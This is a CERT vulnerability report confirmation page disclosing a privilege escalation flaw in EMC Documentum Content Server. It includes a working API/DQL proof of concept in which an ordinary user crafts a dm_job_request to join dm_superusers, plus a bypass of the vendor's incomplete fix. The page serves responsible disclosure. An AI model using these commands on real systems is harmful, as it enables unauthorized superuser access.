Vulnerability Report Confirmation - [VRF#HUFV0UZN] Your vulnerability report has been successfully received. You may save or print this page for your own records. The Report Tracking ID assigned to this report is VRF#HUFV0UZN. Details of your report are listed below. If you have any questions or require additional information, please call the CERT Hotline at +1 412-268-7090 or send email to cert@cert.org . Please reference this Report Tracking ID: VRF#HUFV0UZN. Do not use the back button to submit another report. Click here instead. ------------------------------------------------------------------------ Vulnerability Report Name Andrey B. Panfilov Organization independent Email Address andrew@panfilov.tel Telephone Number Vulnerability Description EMC Documentum Content Server: any user is able to elevate privileges by creating malicious dm_job_request objects Vendor was notified about vulnerability on November 2013, though vendor claims, that vulnerability has been fixed, it wasn't announced and the fix is incomplete. Documentum Content Server has two service tasks intended for renaming users and groups: dm_UserRename and dm_GroupRename. Both are triggered when administrator renames user or group in Documentum Administrator or when dm_LDAPSynchronization job completes its execution. Those jobs polls uncompleted dm_job_request objects and performs corresponding changes, the problem is any user is able to create malicious dm_job_request object and either rename his group to system group (e.g. dm_superusers) or get unauthorized access to objects. Example of exploitation: -- creating test group API> create,c,dm_group ... 1201d9208000dd00 API> set,c,l,group_name SET> testjobrequest ... OK API> save,c,l ... OK -- creating test user API> create,c,dm_user ... 1101d9208007890i API> set,c,l,user_name SET> testjobrequestusr ... OK API> set,c,l,user_login_name SET> testjobrequestusr ... OK API> set,c,l,user_source SET> inline password ... OK API> set,c,l,user_password SET> test ... OK API> save,c,l ... OK API> ?,c,alter group testjobrequest add testjobrequestusr -- creating test user session API> connect,repo,testjobrequestusr,test ... s1 -- creating request to rename testjobrequest group to dm_superusers API> ?,s1,CREATE dm_job_request OBJECT set object_name='GroupRename', set job_name='dm_GroupRename', set method_name='dm_GroupRename', set arguments_keys[0]='OldGroupName', set arguments_values[0]='testjobrequest', set arguments_keys[1]='NewGroupName', set arguments_values[1]='dm_superusers', set arguments_keys[2]='report_only', set arguments_values[2]='F', set arguments_keys[3]='unlock_locked_obj', set arguments_values[3]='T' object_created ---------------- 0801d920805759f7 (1 row affected) -- wait some time while dm_GroupRename job completes -- now testjobrequestusr user is a member of dm_superusers group API> ?,s1,select group_name from dm_group where any i_all_users_names='testjobrequestusr' group_name -------------------------------- dm_superusers (1 row affected) Currently EMC is trying to implement following approach to fix this issue - they denying to create dm_job_request objects with specific values of job_name: [DM_SESSION_I_SESSION_START]info: "Session 0101d920800f022e started for user unprivileged_user." Connected to Documentum Server running Release 6.7.1260.0322 Linux.Oracle 1> CREATE dm_job_request OBJECT set object_name='GroupRename', 2> set job_name='dm_GroupRename', 3> set method_name='dm_GroupRename', 4> set arguments_keys[0]='OldGroupName', 5> set arguments_values[0]='testjobrequest', 6> set arguments_keys[1]='NewGroupName', 7> set arguments_values[1]='dm_superusers', 8> set arguments_keys[2]='report_only', 9> set arguments_values[2]='F', 10> set arguments_keys[3]='unlock_locked_obj', 11> set arguments_values[3]='T' 12> go [DM_QUERY_F_UP_SAVE]fatal: "UPDATE: An error has occurred during a save operation." [DM_USER_E_NEED_SU_OR_SYS_PRIV]error: "The current user (unprivileged_user) needs to have superuser or sysadmin privilege." BUT: 1> CREATE dm_job_request OBJECT set object_name='GroupRename', 2> set job_name='dm_GroupRename1', 2> set method_name='dm_GroupRename', 4> set arguments_keys[0]='OldGroupName', 5> set arguments_values[0]='testjobrequest', 6> set arguments_keys[1]='NewGroupName', 7> set arguments_values[1]='dm_superusers', 8> set arguments_keys[2]='report_only', 9> set arguments_values[2]='F', 10> set arguments_keys[3]='unlock_locked_obj', 11> set arguments_values[3]='T' 12> go object_created ---------------- 0801d92080592bcd (1 row affected) So, according to VRF#HUFU6FNP non-privileged user is still able to exploit this vulnerability by creating own dm_job object and malicious dm_job_request. Also note that user with sysadmin privilege (VRF#HUDHKNW4) is able to exploit with vulnerability. Can we provide your name to the vendor? Yes Do you want to be publicly acknowledged? Yes Vendor Contact Status will not contact Vendor Name EMC Vendor Contact Name Vendor Contact Email Vendor Contact Telephone Number Vendor Tracking ID Additional Vendor Information Affected System Configurations All versions of EMC Documentum Content Server How was this vulnerability found? Is the vulnerability being exploited? Yes Is there a public exploit? No Vulnerability Impact Comments Attached File Date 2014-04-25T15:16:00 Report Tracking ID VRF#HUFV0UZN CERT Tracking IDs VU#315340 ------------------------------------------------------------------------ Carnegie Mellon University ©2014 Carnegie Mellon University